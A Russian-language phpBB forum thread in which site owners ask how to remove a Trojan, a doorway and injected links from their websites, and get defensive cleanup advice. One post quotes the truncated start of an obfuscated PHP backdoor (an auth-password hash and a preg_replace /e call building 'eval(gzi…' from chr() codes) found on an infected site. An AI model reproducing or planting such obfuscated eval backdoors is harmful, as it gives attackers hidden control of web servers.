Как убить Трояна?
					Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
 ).
		
		
	Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
- 
				AdmninsCluba
 - phpBB 1.2.1
 - Сообщения: 22
 - Стаж: 19 лет 2 месяца
 - Благодарил (а): 1 раз
 
Как убить Трояна?
обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
			
			
									
						Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
- 
				boroda-max
														 - phpBB 1.4.4
 - Сообщения: 110
 - Стаж: 13 лет 7 месяцев
 - Откуда: CCCР. Ленинград
 - Благодарил (а): 31 раз
 - Поблагодарили: 5 раз
 
Re: Касперский видит вирус
Запрашиваемый веб-адрес не может быть предоставлен
Веб-адрес:http://alla-doctor.info/
Заблокирован Веб-Антивирусом
Причина: опасный веб-адрес
Нажмите здесь, если считаете, что веб-страница заблокирована ошибочно.
Способ обнаружения: базы
Сообщение создано: 19:35:26
Так он и будет ругаться - пока Администратор не спишется с суппортом Касперского.....
			
			
									
						Веб-адрес:http://alla-doctor.info/
Заблокирован Веб-Антивирусом
Причина: опасный веб-адрес
Нажмите здесь, если считаете, что веб-страница заблокирована ошибочно.
Способ обнаружения: базы
Сообщение создано: 19:35:26
Так он и будет ругаться - пока Администратор не спишется с суппортом Касперского.....
- 
				Balamut
														 - Former team member
 - Сообщения: 2214
 - Стаж: 20 лет 7 месяцев
 - Откуда: {postrow.POSTER_FROM}
 - Поблагодарили: 68 раз
 
Re: Касперский видит вирус
покажите содержимое этого файла. Кто устанавливал, откуда и зачем?AdmninsCluba писал(а):73dce75b0ef045f77e443a1beae076ff.php
//
// That's all, Folks!
// -------------------------------------------------
			
						// That's all, Folks!
// -------------------------------------------------
- 
				папа
 - phpBB 1.4.4
 - Сообщения: 106
 - Стаж: 13 лет 10 месяцев
 
Re: Как убить Трояна?
ко мне на сайт залили шелл
кто нибудь сталкивался?
			
			
													кто нибудь сталкивался?
					Последний раз редактировалось папа 14.05.2013 16:13, всего редактировалось 1 раз.
									
			
						- 
				MIT
														 - Former team member
 - Сообщения: 2500
 - Стаж: 16 лет 7 месяцев
 - Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
 - Поблагодарили: 26 раз
 
Re: Как убить Трояна?
Это не шелл, а дорвей.
Удали папку нафиг и сиди ищи подозрительные файлы (вне этой папки), меняй пароли и т.д...
			
			
									
						Удали папку нафиг и сиди ищи подозрительные файлы (вне этой папки), меняй пароли и т.д...
- 
				папа
 - phpBB 1.4.4
 - Сообщения: 106
 - Стаж: 13 лет 10 месяцев
 
- 
				Zhenjka
 - phpBB 1.4.1
 - Сообщения: 46
 - Стаж: 12 лет 9 месяцев
 - Откуда: Кемерово
 - Благодарил (а): 1 раз
 
Проверка сайта на дыры
Здравствуйте.
Есть ли какой нибудь сервис по проверке сайта на вирус и эксплойты в скриптах? Просто есть один сайт на вордпрессе, асперский стал ругаться на загрузку ссылки spraos.pw. Просмотрел что есть в интернете, прошерстил, несколько файлов удалил посторонних, но все где то еще остался. Возможно дыра есть в самом стиле, который автор сам сварганил.
P.S. Сервисы, которые предлагают в интернете проверку сайтов ругаются только на фреймы ютуба.
			
			
									
						Есть ли какой нибудь сервис по проверке сайта на вирус и эксплойты в скриптах? Просто есть один сайт на вордпрессе, асперский стал ругаться на загрузку ссылки spraos.pw. Просмотрел что есть в интернете, прошерстил, несколько файлов удалил посторонних, но все где то еще остался. Возможно дыра есть в самом стиле, который автор сам сварганил.
P.S. Сервисы, которые предлагают в интернете проверку сайтов ругаются только на фреймы ютуба.
- 
				Garret_Dark
														 - phpBB 2.0.16
 - Сообщения: 1097
 - Стаж: 16 лет 9 месяцев
 - Откуда: root/world/russia/
 - Благодарил (а): 17 раз
 - Поблагодарили: 24 раза
 
Re: Проверка сайта на дыры
Открываете исходный код страницы, где касперыч ругается, в браузере и ищите по "spraos.pw" если находите, то смотрите где размещена ссылка, далее удаляете ее из файлов форума (тут уже в зависимости от того где ссылка встраивается).
Меняете пароли на хосте, проверяетесь на вирусы и т.п.
Заодно проверьте для профилактики htaccess в корне сайта
			
			
									
						Меняете пароли на хосте, проверяетесь на вирусы и т.п.
Заодно проверьте для профилактики htaccess в корне сайта
Мои моды:
Полноценный интернет-магазин для phpbb3
Белый список IP для пользователей индивидуально
Парсер сообщений (автозамена)
User FAQ (Пользовательский FAQ)
Google Map MOD 0.4.2 [RUS]
Anti Double IP - Запрет множественных рег с одного IP
PM All in 1 - ЛС "Все включено"
Шкала последней активности пользователя
Поддержка только в указанных темах! В ЛС только по личным вопросам или за WM.
			
						Полноценный интернет-магазин для phpbb3
Белый список IP для пользователей индивидуально
Парсер сообщений (автозамена)
User FAQ (Пользовательский FAQ)
Google Map MOD 0.4.2 [RUS]
Anti Double IP - Запрет множественных рег с одного IP
PM All in 1 - ЛС "Все включено"
Шкала последней активности пользователя
Поддержка только в указанных темах! В ЛС только по личным вопросам или за WM.
- 
				Zhenjka
 - phpBB 1.4.1
 - Сообщения: 46
 - Стаж: 12 лет 9 месяцев
 - Откуда: Кемерово
 - Благодарил (а): 1 раз
 
Re: Проверка сайта на дыры
Garret_Dark, в том то и дело что нигде нет упоминания ссылки, искал уже. Ссылка зашифрована типа так
			
			
									
						Код: Выделить всё
 <?php
 $auth_pass='818d0a0fd60532d7453a2b314167e6ef';preg_replace("/.*/".'e',chr(101).chr(118).chr(97).chr(108).chr(40).chr(103).chr(122).chr(105).- 
				MIT
														 - Former team member
 - Сообщения: 2500
 - Стаж: 16 лет 7 месяцев
 - Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
 - Поблагодарили: 26 раз
 
Re: Проверка сайта на дыры
Есть вот такой вот "сканер": http://www.revisium.com/ai/
Для борьбы со школьниками вполне подходит.
			
			
									
						Для борьбы со школьниками вполне подходит.
- 
				Zhenjka
 - phpBB 1.4.1
 - Сообщения: 46
 - Стаж: 12 лет 9 месяцев
 - Откуда: Кемерово
 - Благодарил (а): 1 раз
 
Re: Как убить Трояна?
Нашел где этот вирус сидел, на сайте стоял вордпресс и опенкарт в качестве магазина. Магазин не пользовался и просто лежал на хостинге, даже был переименован в shop1. Переименовал каталог с магазином и касперский перестал ругаться.
Я только одного не пойму, вордпресс с опенкартом никак не были связаны но вирус вылазил на стартовой странице вордпресса.
			
			
									
						Я только одного не пойму, вордпресс с опенкартом никак не были связаны но вирус вылазил на стартовой странице вордпресса.
- 
				MAzZY
 - Бывший член :)
 - Сообщения: 2925
 - Стаж: 20 лет 5 месяцев
 - Благодарил (а): 19 раз
 - Поблагодарили: 30 раз
 - Забанен: Бессрочно
 
Re: Как убить Трояна?
Вот есть новый интересный сервис. http://webimho.ru/topic/5975/
Человек давно и плотно занимается лечение разных сайтовых взломов и заражений. Так что инструмент обещает быть хорошим. Если что-то непонятно - спрашивайте в той теме
			
			
									
						Человек давно и плотно занимается лечение разных сайтовых взломов и заражений. Так что инструмент обещает быть хорошим. Если что-то непонятно - спрашивайте в той теме
- 
				MIT
														 - Former team member
 - Сообщения: 2500
 - Стаж: 16 лет 7 месяцев
 - Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
 - Поблагодарили: 26 раз
 
Re: Как убить Трояна?
Школьникам стало нечего делать. Пошли спасать мир, не иначе.
Пусть хоть XSS с главной уберёт, а то ну совсем не серьёзно.
			
			
									
						Пусть хоть XSS с главной уберёт, а то ну совсем не серьёзно.
- 
				Zhenjka
 - phpBB 1.4.1
 - Сообщения: 46
 - Стаж: 12 лет 9 месяцев
 - Откуда: Кемерово
 - Благодарил (а): 1 раз
 
- 
				MIT
														 - Former team member
 - Сообщения: 2500
 - Стаж: 16 лет 7 месяцев
 - Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
 - Поблагодарили: 26 раз
 

